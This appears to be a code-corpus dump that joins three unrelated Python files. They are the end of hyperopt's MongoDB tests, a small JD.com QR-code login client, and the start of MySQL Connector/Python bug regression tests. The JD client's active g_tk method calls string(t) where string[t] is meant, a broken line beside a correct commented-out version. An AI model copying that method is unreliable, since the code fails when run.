os.kill(self.mongo_proc.pid, signal.SIGTERM)
except OSError:
pass # if it crashed there is no such process
out, err = self.mongo_proc.communicate()
print(out, file=sys.stderr)
print(err, file=sys.stderr)
raise RuntimeError("No database connection", proc_args)
except Exception as e:
try:
os.kill(self.mongo_proc.pid, signal.SIGTERM)
except OSError:
pass # if it crashed there is no such process
raise e
def __exit__(self, *args):
os.kill(self.mongo_proc.pid, signal.SIGTERM)
self.mongo_proc.wait()
subprocess.call(["rm", "-Rf", self.workdir])
@staticmethod
def connection_string(dbname):
return as_mongo_str(f"localhost:22334/{dbname}/jobs")
@staticmethod
def mongo_jobs(dbname):
return MongoJobs.new_from_connection_str(TempMongo.connection_string(dbname))
def db_up(self):
try:
self.mongo_jobs("__test_db")
return True
except: # XXX: don't know what exceptions to put here
return False
def test_parse_url():
uris = [
"mongo://hyperopt:foobar@127.0.0.1:27017/hyperoptdb/jobs",
"mongo://hyperopt:foobar@127.0.0.1:27017/hyperoptdb/jobs?authSource=db1",
]
expected = [
("mongo", "hyperopt", "foobar", "127.0.0.1", 27017, "hyperoptdb", "jobs", None),
(
"mongo",
"hyperopt",
"foobar",
"127.0.0.1",
27017,
"hyperoptdb",
"jobs",
"db1",
),
]
for i, uri in enumerate(uris):
assert parse_url(uri) == expected[i]
# -- If we can't create a TempMongo instance, then
# simply print what happened,
try:
with TempMongo() as temp_mongo:
pass
except OSError as e:
print(e, file=sys.stderr)
print(
("Failed to create a TempMongo context," " skipping all mongo tests."),
file=sys.stderr,
)
if "such file" in str(e):
print("Hint: is mongod executable on path?", file=sys.stderr)
raise nose.SkipTest()
class TestMongoTrials(hyperopt.tests.test_base.TestTrials):
def setUp(self):
self.temp_mongo = TempMongo()
self.temp_mongo.__enter__()
self.trials = MongoTrials(
self.temp_mongo.connection_string("foo"), exp_key=None
)
def tearDown(self, *args):
self.temp_mongo.__exit__(*args)
def with_mongo_trials(f, exp_key=None):
def wrapper():
with TempMongo() as temp_mongo:
trials = MongoTrials(temp_mongo.connection_string("foo"), exp_key=exp_key)
print("Length of trials: ", len(trials.results))
f(trials)
wrapper.__name__ = f.__name__
return wrapper
def _worker_thread_fn(host_id, n_jobs, timeout, dbname="foo", logfilename=None):
mw = MongoWorker(
mj=TempMongo.mongo_jobs(dbname),
logfilename=logfilename,
workdir="mongoexp_test_dir",
)
try:
while n_jobs:
mw.run_one(host_id, timeout, erase_created_workdir=True)
print("worker: %s ran job" % str(host_id))
n_jobs -= 1
except ReserveTimeout:
print("worker timed out:", host_id)
pass
def with_worker_threads(n_threads, dbname="foo", n_jobs=sys.maxsize, timeout=10.0):
"""
Decorator that will run a test with some MongoWorker threads in flight
"""
def newth(ii):
return threading.Thread(
target=_worker_thread_fn, args=(("hostname", ii), n_jobs, timeout, dbname)
)
def deco(f):
def wrapper(*args, **kwargs):
# --start some threads
threads = list(map(newth, list(range(n_threads))))
[th.start() for th in threads]
try:
return f(*args, **kwargs)
finally:
[th.join() for th in threads]
wrapper.__name__ = f.__name__ # -- nose requires test in name
return wrapper
return deco
@with_mongo_trials
def test_with_temp_mongo(trials):
pass # -- just verify that the decorator can run
@with_mongo_trials
def test_new_trial_ids(trials):
a = trials.new_trial_ids(1)
b = trials.new_trial_ids(2)
c = trials.new_trial_ids(3)
assert len(a) == 1
assert len(b) == 2
assert len(c) == 3
s = set()
s.update(a)
s.update(b)
s.update(c)
assert len(s) == 6
@with_mongo_trials
def test_attachments(trials):
blob = b"abcde"
assert "aname" not in trials.attachments
trials.attachments["aname"] = blob
assert "aname" in trials.attachments
assert trials.attachments["aname"] == blob
assert trials.attachments["aname"] == blob
blob2 = b"zzz"
trials.attachments["aname"] = blob2
assert "aname" in trials.attachments
assert trials.attachments["aname"] == blob2
assert trials.attachments["aname"] == blob2
del trials.attachments["aname"]
assert "aname" not in trials.attachments
@with_mongo_trials
def test_delete_all_on_attachments(trials):
trials.attachments["aname"] = "a"
trials.attachments["aname2"] = "b"
assert "aname2" in trials.attachments
trials.delete_all()
assert "aname" not in trials.attachments
assert "aname2" not in trials.attachments
def test_handles_are_independent():
with TempMongo() as tm:
t1 = tm.mongo_jobs("t1")
t2 = tm.mongo_jobs("t2")
assert len(t1) == 0
assert len(t2) == 0
# test that inserting into t1 doesn't affect t2
t1.insert({"a": 7})
assert len(t1) == 1
assert len(t2) == 0
def passthrough(x):
assert os.path.split(os.getcwd()).count("mongoexp_test_dir") == 1, (
"cwd is %s" % os.getcwd()
)
return x
class TestExperimentWithThreads(unittest.TestCase):
@staticmethod
def worker_thread_fn(host_id, n_jobs, timeout):
mw = MongoWorker(
mj=TempMongo.mongo_jobs("foodb"),
logfilename=None,
workdir="mongoexp_test_dir",
)
while n_jobs:
mw.run_one(host_id, timeout, erase_created_workdir=True)
print("worker: %s ran job" % str(host_id))
n_jobs -= 1
@staticmethod
def fmin_thread_fn(space, trials, max_evals, seed):
fmin(
fn=passthrough,
space=space,
algo=rand.suggest,
trials=trials,
rstate=np.random.RandomState(seed),
max_evals=max_evals,
return_argmin=False,
)
def test_seeds_AAB(self):
# launch 3 simultaneous experiments with seeds A, A, B.
# Verify all experiments run to completion.
# Verify first two experiments run identically.
# Verify third experiment runs differently.
exp_keys = ["A0", "A1", "B"]
seeds = [1, 1, 2]
n_workers = 2
jobs_per_thread = 6
# -- total jobs = 2 * 6 = 12
# -- divided by 3 experiments: 4 jobs per fmin
max_evals = (n_workers * jobs_per_thread) // len(exp_keys)
# -- should not matter which domain is used here
domain = gauss_wave2()
pickle.dumps(domain.expr)
pickle.dumps(passthrough)
worker_threads = [
threading.Thread(
target=TestExperimentWithThreads.worker_thread_fn,
args=(("hostname", ii), jobs_per_thread, 30.0),
)
for ii in range(n_workers)
]
with TempMongo() as tm:
mj = tm.mongo_jobs("foodb")
print(mj)
trials_list = [
MongoTrials(tm.connection_string("foodb"), key) for key in exp_keys
]
fmin_threads = [
threading.Thread(
target=TestExperimentWithThreads.fmin_thread_fn,
args=(domain.expr, trials, max_evals, seed),
)
for seed, trials in zip(seeds, trials_list)
]
try:
[th.start() for th in worker_threads + fmin_threads]
finally:
print("joining worker threads...")
[th.join() for th in worker_threads + fmin_threads]
# -- not using an exp_key gives a handle to all the trials
# in foodb
all_trials = MongoTrials(tm.connection_string("foodb"))
self.assertEqual(len(all_trials), n_workers * jobs_per_thread)
# Verify that the fmin calls terminated correctly:
for trials in trials_list:
self.assertEqual(
trials.count_by_state_synced(JOB_STATE_DONE), max_evals
)
self.assertEqual(
trials.count_by_state_unsynced(JOB_STATE_DONE), max_evals
)
self.assertEqual(len(trials), max_evals)
# Verify that the first two experiments match.
# (Do these need sorting by trial id?)
trials_A0, trials_A1, trials_B0 = trials_list
self.assertEqual(
[t["misc"]["vals"] for t in trials_A0.trials],
[t["misc"]["vals"] for t in trials_A1.trials],
)
# Verify that the last experiment does not match.
# (Do these need sorting by trial id?)
self.assertNotEqual(
[t["misc"]["vals"] for t in trials_A0.trials],
[t["misc"]["vals"] for t in trials_B0.trials],
)
def objective_with_attachments(x: float):
"""Objective function that includes extra information as attachments and
dictionary attributes."""
return {
"loss": x ** 2,
"status": STATUS_OK,
"extra_stuff": {"type": None, "value": [0, 1, 2]},
"attachments": {"time": pickle.dumps(time.time)},
}
def fmin_thread_fn(space, mongo_trials: MongoTrials, max_evals: int):
fmin(
fn=objective_with_attachments,
space=space,
algo=rand.suggest,
trials=mongo_trials,
rstate=np.random.RandomState(),
max_evals=max_evals,
return_argmin=False,
)
def test_trial_attachments():
exp_key = "A"
with TempMongo() as tm:
mj = tm.mongo_jobs("foo")
trials = MongoTrials(tm.connection_string("foo"), exp_key=exp_key)
space = hp.uniform("x", -10, 10)
max_evals = 3
fmin_thread = threading.Thread(
target=fmin_thread_fn, args=(space, trials, max_evals)
)
fmin_thread.start()
mw = MongoWorker(mj=mj, logfilename=None, workdir="mongoexp_test_dir")
n_jobs = max_evals
while n_jobs:
try:
mw.run_one("hostname", 10.0, erase_created_workdir=True)
print("worker: ran job")
except Exception as exc:
print(f"worker: encountered error : {str(exc)}")
traceback.print_exc()
n_jobs -= 1
fmin_thread.join()
all_trials = MongoTrials(tm.connection_string("foo"))
assert len(all_trials) == max_evals
assert trials.count_by_state_synced(JOB_STATE_DONE) == max_evals
assert trials.count_by_state_unsynced(JOB_STATE_DONE) == max_evals
class FakeOptions:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
# -- assert that the test raises a ReserveTimeout within 5 seconds
@nose.tools.timed(10.0) # XXX: this needs a suspiciously long timeout
@nose.tools.raises(ReserveTimeout)
@with_mongo_trials
def test_main_worker(trials):
options = FakeOptions(
max_jobs=1,
# XXX: sync this with TempMongo
mongo=as_mongo_str("localhost:22334/foodb"),
reserve_timeout=1,
poll_interval=0.5,
workdir=None,
exp_key="foo",
last_job_timeout=None,
)
# -- check that it runs
# and that the reserve timeout is respected
main_worker_helper(options, ())
|
京东.py
|
# coding:utf-8
from __future__ import absolute_import
try:
from .SDK基类 import Base
except ImportError:
from SDK基类 import Base
from time import time,sleep
from threading import Thread
import json
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
from io import BytesIO
from Crypto.PublicKey import RSA
class JD(Base):
def __init__(self):
super(JD,self).__init__()
self.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
'Referer':'https://passport.jd.com/new/login.aspx?ReturnUrl=https%3A%2F%2Fwww.jd.com%2F'
})
self._rsaString = "A4FDA453C25A775D18C60EF6867ED9B54486CD296B520F9827AF5D10E3ED9E3420C5A088ABA7DB3DF22DC4D2C1448252E54471171351EB2F81618A88A87152B4F4DD340C045416030608C7469D716E162B9FBEE1D3E1C9AB7CD19A8B011D0DFA3BC536FB6A98D47DC2947E1F2E6D23377D79CF4569D11C0232FF7FB3B72E26A5"
# def g_tk(self,string:str=None,cookieName:str='wq_skey'):
# if not string:
# string = self.cookies.get(cookieName,'')
# r = 5381
# for t in range(len(string)):
# r += (r << 5) + ord(string[t])
# return 2147483647 & r
def g_tk(self,string:str=None,cookieName:str='wq_skey'):
if not string:
string = self.cookies.get(cookieName,'')
r = 5381
for t in range(len(string)):
r += (r << 5) + ord(string(t))
return 2147483647 & r
def login(self):
t = int(time()*1000)
url = f'https://qr.m.jd.com/show?appid=133&size=147&t={t}'
img = self.get(url).content
return img
def checkState(self,cookieName:str='wlfstk_smdl',timeout=30):
token = self.cookies.get(cookieName)
def run():
nonlocal timeout
while timeout > 0:
res = self.get(f'https://qr.m.jd.com/check?callback=a&isNewVersion=1&_format_=json&appid=133&token={token}',headers=self.head)
data = json.loads(res.text[2:-1])
if data['code'] == 200:
ticket = data['ticket']
res = self.get(f'https://passport.jd.com/uc/qrCodeTicketValidation?t={ticket}',headers=self.head)
data = json.loads(res.text)
if not data['returnCode']:
print(data['url'])
res = self.get(data['url'],headers=self.head)
break
else:
print(data['msg'])
timeout -= 1
sleep(1)
thr = Thread(target=run)
return thr
if __name__ == '__main__':
jd = JD()
img = jd.login()
plt.imshow(mpimg.imread(BytesIO(img)))
plt.show()
thr = jd.checkState()
thr.start()
thr.join()
res = jd.get(f'https://wq.jd.com/user/info/QueryJDUserInfo?sceneid=80027&sceneval=2&g_login_type=1&g_tk={jd.g_tk()}&g_ty=ls&_format_=json',headers=jd.head)
print(res.text)
|
test_bugs.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2009, 2020, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Test module for bugs
Bug test cases specific to a particular Python (major) version are loaded
from py2.bugs or py3.bugs.
This module was originally located in python2/tests and python3/tests. It
should contain bug test cases which work for both Python v2 and v3.
Whenever a bug is bout to a specific Python version, put the test cases
in tests/py2/bugs.py or tests/py3/bugs.py. It might be that these files need
to be created first.
"""
import io
import os
import gc
import tempfile
from collections import namedtuple
from datetime import date, datetime, timedelta, time
from threading import Thread
import traceback
import time
import unittest
import pickle
import sys
import tests
if tests.SSL_AVAILABLE:
import ssl
from tests import foreach_cnx, cnx_config
from . import PY2
from . import check_tls_versions_support
from mysql.connector import (connection, cursor, conversion, protocol,
errors, constants, pooling)
from mysql.connector.optionfiles import read_option_files
from mysql.connector.pooling import PooledMySQLConnection
from mysql.connector.catch23 import STRING_TYPES
import mysql.connector
try:
from mysql.connector.connection_cext import (CMySQLConnection,
MySQLInterfaceError)
except ImportError:
# Test without C Extension
CMySQLConnection = None
MySQLInterfaceError = None
ERR_NO_CEXT = "C Extension not available"
class Bug437972Tests(tests.MySQLConnectorTests):
def test_windows_tcp_connection(self):
"""lp:437972 TCP connection to Windows"""
if os.name != 'nt':
pass
cnx = None
try:
cnx = connection.MySQLConnection(**tests.get_mysql_config())
except errors.InterfaceError:
self.fail()
if cnx:
cnx.close()
class Bug441430Tests(tests.MySQLConnectorTests):
@foreach_cnx()
def test_execute_return(self):
"""lp:441430 cursor.execute*() should return the cursor.rowcount"""
cur = self.cnx.cursor()
tbl = "buglp44130"
cur.execute("DROP TABLE IF EXISTS %s" % tbl)
cur.execute("CREATE TABLE %s (id INT)" % tbl)
cur.execute("INSERT INTO %s VALUES (%%s),(%%s)" % tbl, (1, 2,))
self.assertEqual(2, cur.rowcount)
stmt = "INSERT INTO %s VALUES (%%s)" % tbl
res = cur.executemany(stmt, [(3,), (4,), (5,), (6,), (7,), (8,)])
self.assertEqual(6, cur.rowcount)
res = cur.execute("UPDATE %s SET id = id + %%s" % tbl, (10,))
self.assertEqual(8, cur.rowcount)
cur.execute("DROP TABLE IF EXISTS {0}".format(tbl))
cur.close()
self.cnx.close()
class Bug454790(tests.MySQLConnectorTests):
"""lp:454790 pyformat / other named parameters broken"""
@foreach_cnx()
def test_pyformat(self):
cur = self.cnx.cursor()
data = {'name': 'Geert', 'year': 1977}
cur.execute("SELECT %(name)s,%(year)s", data)
self.assertEqual(('Geert', 1977), cur.fetchone())
data = [
{'name': 'Geert', 'year': 1977},
{'name': 'Marta', 'year': 1980}
]
cur.executemany("SELECT %(name)s,%(year)s", data)
self.assertEqual(2, cur.rowcount)
cur.close()
self.cnx.close()
class Bug480360(tests.MySQLConnectorTests):
"""lp:480360: fetchall() should return [] when no result"""
@foreach_cnx()
def test_fetchall(self):
cur = self.cnx.cursor()
# Trick to get empty result not needing any table
cur.execute("SELECT * FROM (SELECT 1) AS t WHERE 0 = 1")
self.assertEqual([], cur.fetchall())
cur.close()
self.cnx.close()
@unittest.skipIf(tests.MYSQL_VERSION >= (5, 6, 6),
"Bug380528 not tested with MySQL version >= 5.6.6")
class Bug380528(tests.MySQLConnectorTests):
"""lp:380528: we do not support old passwords"""
@foreach_cnx()
def test_old_password(self):
cur = self.cnx.cursor()
if self.config['unix_socket'] and os.name != 'nt':
user = "'myconnpy'@'localhost'"
else:
user = "'myconnpy'@'%s'" % (config['host'])
try:
cur.execute("GRANT SELECT ON %s.* TO %s" %
(self.config['database'], user))
cur.execute("SET PASSWORD FOR %s = OLD_PASSWORD('fubar')" % (user))
except:
self.fail("Failed executing grant.")
cur.close()
# Test using the newly created user
test_config = self.config.copy()
test_config['user'] = 'myconnpy'
test_config['password'] = 'fubar'
self.assertRaises(errors.NotSupportedError,
self.cnx.__class__, **test_config)
self.cnx = self.cnx.__class__(**self.config)
cur = self.cnx.cursor()
try:
cur.execute("REVOKE SELECT ON %s.* FROM %s" %
(self.config['database'], user))
cur.execute("DROP USER %s" % (user))
except mysql.connector.Error as exc:
self.fail("Failed cleaning up user {0}: {1}".format(user, exc))
cur.close()
class Bug499362(tests.MySQLConnectorTests):
"""lp:499362 Setting character set at connection fails"""
@cnx_config(charset='latin1')
@foreach_cnx()
def test_charset(self):
cur = self.cnx.cursor()
ver = self.cnx.get_server_version()
varlst = ['character_set_client', 'character_set_connection',
'character_set_results']
if ver < (5, 1, 12):
exp1 = [('character_set_client', 'latin1'),
('character_set_connection', 'latin1'),
('character_set_database', 'utf8'),
('character_set_filesystem', 'binary'),
('character_set_results', 'latin1'),
('character_set_server', 'utf8'),
('character_set_system', 'utf8')]
exp2 = [('character_set_client', 'latin2'),
('character_set_connection', 'latin2'),
('character_set_database', 'utf8'),
('character_set_filesystem', 'binary'),
('character_set_results', 'latin2'),
('character_set_server', 'utf8'),
('character_set_system', 'utf8')]
varlst = []
stmt = r"SHOW SESSION VARIABLES LIKE 'character\_set\_%%'"
exp1 = [('CHARACTER_SET_CONNECTION', 'latin1'),
('CHARACTER_SET_CLIENT', 'latin1'),
('CHARACTER_SET_RESULTS', 'latin1')]
exp2 = [('CHARACTER_SET_CONNECTION', 'latin2'),
('CHARACTER_SET_CLIENT', 'latin2'),
('CHARACTER_SET_RESULTS', 'latin2')]
elif ver >= (5, 7, 6):
# INFORMATION_SCHEMA is deprecated
exp1 = [('character_set_client', 'latin1'),
('character_set_connection', 'latin1'),
('character_set_results', 'latin1')]
exp2 = [('character_set_client', 'latin2'),
('character_set_connection', 'latin2'),
('character_set_results', 'latin2')]
stmt = ("SELECT * FROM performance_schema.session_variables "
"WHERE VARIABLE_NAME IN (%s,%s,%s)")
else:
exp1 = [('CHARACTER_SET_CONNECTION', 'latin1'),
('CHARACTER_SET_CLIENT', 'latin1'),
('CHARACTER_SET_RESULTS', 'latin1')]
exp2 = [('CHARACTER_SET_CONNECTION', 'latin2'),
('CHARACTER_SET_CLIENT', 'latin2'),
('CHARACTER_SET_RESULTS', 'latin2')]
stmt = ("SELECT * FROM INFORMATION_SCHEMA.SESSION_VARIABLES "
"WHERE VARIABLE_NAME IN (%s,%s,%s)")
cur.execute(stmt, varlst)
res1 = cur.fetchall()
self.cnx.set_charset_collation('latin2')
cur.execute(stmt, varlst)
res2 = cur.fetchall()
cur.close()
self.cnx.close()
self.assertTrue(tests.cmp_result(exp1, res1))
self.assertTrue(tests.cmp_result(exp2, res2))
class Bug501290(tests.MySQLConnectorTests):
"""lp:501290 Client flags are set to None when connecting"""
def _setup(self):
self.capabilities = self.cnx._handshake['capabilities']
self.default_flags = constants.ClientFlag.get_default()
if self.capabilities & constants.ClientFlag.PLUGIN_AUTH:
self.default_flags |= constants.ClientFlag.PLUGIN_AUTH
@foreach_cnx()
def test_default(self):
self._setup()
flags = constants.ClientFlag.default
for flag in flags:
self.assertTrue(self.cnx._client_flags & flag)
@foreach_cnx()
def test_set_unset(self):
self._setup()
orig = self.cnx._client_flags
exp = self.default_flags | constants.ClientFlag.COMPRESS
if tests.MYSQL_VERSION < (5, 7):
exp = exp & ~constants.ClientFlag.CONNECT_ARGS
self.cnx.set_client_flags([constants.ClientFlag.COMPRESS])
for flag in constants.ClientFlag.default:
self.assertTrue(self.cnx._client_flags & flag)
self.cnx.set_client_flags([-constants.ClientFlag.COMPRESS])
self.assertEqual(self.cnx._client_flags, orig)
@foreach_cnx()
def test_isset_client_flag(self):
self._setup()
flag = constants.ClientFlag.COMPRESS
data = self.default_flags | flag
self.cnx._client_flags = data
self.assertEqual(True, self.cnx.isset_client_flag(flag))
class Bug507466(tests.MySQLConnectorTests):
"""lp:507466 BIT values are not converted correctly to Python"""
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
try:
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS myconnpy_bits")
except:
pass
cnx.close()
@foreach_cnx()
def test_bits(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS myconnpy_bits")
cur.execute("""CREATE TABLE `myconnpy_bits` (
`id` int NOT NULL AUTO_INCREMENT,
`c1` bit(8) DEFAULT NULL,
`c2` bit(16) DEFAULT NULL,
`c3` bit(24) DEFAULT NULL,
`c4` bit(32) DEFAULT NULL,
`c5` bit(40) DEFAULT NULL,
`c6` bit(48) DEFAULT NULL,
`c7` bit(56) DEFAULT NULL,
`c8` bit(64) DEFAULT NULL,
PRIMARY KEY (id)
)
""")
insert = """insert into myconnpy_bits (c1,c2,c3,c4,c5,c6,c7,c8)
values (%s,%s,%s,%s,%s,%s,%s,%s)"""
select = "SELECT c1,c2,c3,c4,c5,c6,c7,c8 FROM myconnpy_bits ORDER BY id"
data = []
data.append((0, 0, 0, 0, 0, 0, 0, 0))
data.append((
1 << 7, 1 << 15, 1 << 23, 1 << 31,
1 << 39, 1 << 47, 1 << 55, (1 << 63)-1,
))
cur.executemany(insert, data)
cur.execute(select)
rows = cur.fetchall()
self.assertEqual(rows, data)
self.cnx.close()
class Bug519301(tests.MySQLConnectorTests):
"""lp:519301 Temporary connection failures with 2 exceptions"""
@foreach_cnx()
def test_auth(self):
config = self.config.copy()
config.pop('unix_socket')
config['user'] = 'ham'
config['password'] = 'spam'
for _ in range(1, 100):
try:
cnx = self.cnx.__class__(**config)
except errors.ProgrammingError:
pass
except errors.Error as err:
self.fail("Failing authenticating: {0}".format(str(err)))
except:
raise
else:
cnx.close()
class Bug524668(tests.MySQLConnectorTests):
"""lp:524668 Error in server handshake with latest code"""
def test_handshake(self):
handshake = bytearray(
b'\x47\x00\x00\x00\x0a\x35\x2e\x30\x2e\x33\x30\x2d\x65'
b'\x6e\x74\x65\x72\x70\x72\x69\x73\x65\x2d\x67\x70\x6c'
b'\x2d\x6c\x6f'
b'\x67\x00\x09\x01\x00\x00\x68\x34\x69\x36\x6f\x50\x21\x4f\x00'
b'\x2c\xa2\x08\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00'
b'\x00\x00\x4c\x6e\x67\x39\x26\x50\x44\x40\x57\x72\x59\x48\x00'
)
prtcl = protocol.MySQLProtocol()
try:
prtcl.parse_handshake(handshake)
except:
self.fail("Failed handling handshake")
class Bug571201(tests.MySQLConnectorTests):
"""lp:571201 Problem with more than one statement at a time"""
def setUp(self):
self.tbl = 'Bug571201'
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
try:
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
except:
pass
cnx.close()
@foreach_cnx()
def test_multistmts(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.execute(("CREATE TABLE {0} ( "
"id INT AUTO_INCREMENT KEY, "
"c1 INT)").format(self.tbl))
stmts = [
"SELECT * FROM %s" % (self.tbl),
"INSERT INTO %s (c1) VALUES (10),(20)" % (self.tbl),
"SELECT * FROM %s" % (self.tbl),
]
result_iter = cur.execute(';'.join(stmts), multi=True)
self.assertEqual(None, next(result_iter).fetchone())
self.assertEqual(2, next(result_iter).rowcount)
exp = [(1, 10), (2, 20)]
self.assertEqual(exp, next(result_iter).fetchall())
self.assertRaises(StopIteration, next, result_iter)
self.cnx.close()
class Bug551533and586003(tests.MySQLConnectorTests):
"""lp: 551533 as 586003: impossible to retrieve big result sets"""
def setUp(self):
self.tbl = 'Bug551533'
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {table}".format(table=self.tbl))
cnx.close()
@cnx_config(connection_timeout=10)
@foreach_cnx()
def test_select(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {table}".format(table=self.tbl))
cur.execute(
("CREATE TABLE {table} (id INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(100) DEFAULT 'abcabcabcabcabcabcabcabcabcabc') "
"ENGINE=INNODB").format(table=self.tbl)
)
insert = "INSERT INTO {table} (id) VALUES (%s)".format(table=self.tbl)
exp = 20000
cur.executemany(insert, [(None,)] * exp)
self.cnx.commit()
cur.execute(
'SELECT * FROM {table} LIMIT 20000'.format(table=self.tbl))
try:
rows = cur.fetchall()
except errors.Error as err:
self.fail("Failed retrieving big result set: {0}".format(err))
else:
self.assertEqual(exp, cur.rowcount)
self.assertEqual(exp, len(rows))
class Bug675425(tests.MySQLConnectorTests):
"""lp: 675425: Problems with apostrophe"""
def setUp(self):
self.tbl = 'Bug675425'
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_executemany_escape(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.execute("CREATE TABLE {0} (c1 VARCHAR(30),"
" c2 VARCHAR(30))".format(self.tbl))
data = [
("ham", "spam",),
("spam", "ham",),
("ham \\' spam", "spam ' ham",)
]
sql = "INSERT INTO {0} VALUES (%s, %s)".format(self.tbl)
try:
cur.executemany(sql, data)
except Exception as exc:
self.fail(str(exc))
self.cnx.close()
class Bug695514(tests.MySQLConnectorTests):
"""lp: 695514: Infinite recursion when setting connection client_flags"""
@foreach_cnx()
def test_client_flags(self):
try:
config = tests.get_mysql_config()
config['connection_timeout'] = 2
config['client_flags'] = constants.ClientFlag.get_default()
self.cnx = self.cnx.__class__(**config)
except:
self.fail("Failed setting client_flags using integer")
class Bug809033(tests.MySQLConnectorTests):
"""lp: 809033: Lost connection causes infinite loop"""
def setUp(self):
self.table_name = 'Bug809033'
def _setup(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.table_name))
table = (
"CREATE TABLE {table} ("
" id INT UNSIGNED NOT NULL AUTO_INCREMENT,"
" c1 VARCHAR(255) DEFAULT '{default}',"
" PRIMARY KEY (id)"
")"
).format(table=self.table_name, default='a' * 255)
self.cnx.cmd_query(table)
stmt = "INSERT INTO {table} (id) VALUES {values}".format(
table=self.table_name,
values=','.join(['(NULL)'] * 1024)
)
self.cnx.cmd_query(stmt)
def tearDown(self):
try:
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query(
"DROP TABLE IF EXISTS {0}".format(self.table_name))
cnx.close()
except:
pass
@foreach_cnx()
def test_lost_connection(self):
self._setup()
def kill(connection_id):
"""Kill connection using separate connection"""
killer = connection.MySQLConnection(**tests.get_mysql_config())
time.sleep(1)
killer.cmd_query("KILL {0}".format(connection_id))
killer.close()
def sleepy_select(cnx):
"""Execute a SELECT statement which takes a while to complete"""
cur = cnx.cursor()
# Ugly query ahead!
stmt = "SELECT x1.*, x2.* from {table} as x1, {table} as x2".format(
table=self.table_name)
cur.execute(stmt)
# Save the error so we can check in the calling thread
cnx.test_error = None
try:
cur.fetchall()
except errors.Error as err:
cnx.test_error = err
worker = Thread(target=sleepy_select, args=[self.cnx])
killer = Thread(target=kill, args=[self.cnx.connection_id])
worker.start()
killer.start()
worker.join()
killer.join()
self.assertTrue(
isinstance(self.cnx.test_error,
(errors.InterfaceError, errors.OperationalError))
)
self.cnx.close()
class Bug865859(tests.MySQLConnectorTests):
"""lp: 865859: sock.recv fails to return in some cases (infinite wait)"""
def setUp(self):
self.table_name = 'Bug865859'
@cnx_config(connection_timeout=1)
@foreach_cnx()
def test_reassign_connection(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_name))
cur.execute("CREATE TABLE {0} (c1 INT)".format(self.table_name))
cur.execute("INSERT INTO {0} (c1) VALUES (1)".format(self.table_name))
try:
# We create a new cnx, replacing current
self.cnx = self.cnx.__class__(**self.config)
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_name))
except errors.InterfaceError as err:
self.fail(
"Connection was not closed, we got timeout: {0}".format(err))
else:
cur.close()
self.cnx.close()
class BugOra13395083(tests.MySQLConnectorTests):
"""BUG#13395083: Using time zones"""
def setUp(self):
self.table_name = 'BugOra13395083'
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_name))
@cnx_config(time_zone="+00:00")
@foreach_cnx()
def test_time_zone(self):
utc = tests.UTCTimeZone()
testzone = tests.TestTimeZone(+2)
# Store a datetime in UTC into a TIMESTAMP column
now_utc = datetime.utcnow().replace(microsecond=0, tzinfo=utc)
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_name))
cur.execute("CREATE TABLE {0} (c1 TIMESTAMP)".format(self.table_name))
cur.execute(
"INSERT INTO {0} (c1) VALUES (%s)".format(self.table_name),
(now_utc,))
self.cnx.commit()
cur.execute("SELECT c1 FROM {0}".format(self.table_name))
row = cur.fetchone()
self.assertEqual(now_utc, row[0].replace(tzinfo=utc))
self.cnx.time_zone = "+02:00"
cur.execute("SELECT c1 FROM {0}".format(self.table_name))
row = cur.fetchone()
self.assertEqual(now_utc.astimezone(testzone),
row[0].replace(tzinfo=testzone))
self.cnx.close()
class BugOra13392739(tests.MySQLConnectorTests):
"""BUG#13392739: MySQLConnection.ping()"""
@cnx_config(connection_timeout=2, unix_socket=None)
@foreach_cnx()
def test_ping(self):
cnx = self.cnx.__class__()
self.assertRaises(errors.InterfaceError, cnx.ping)
try:
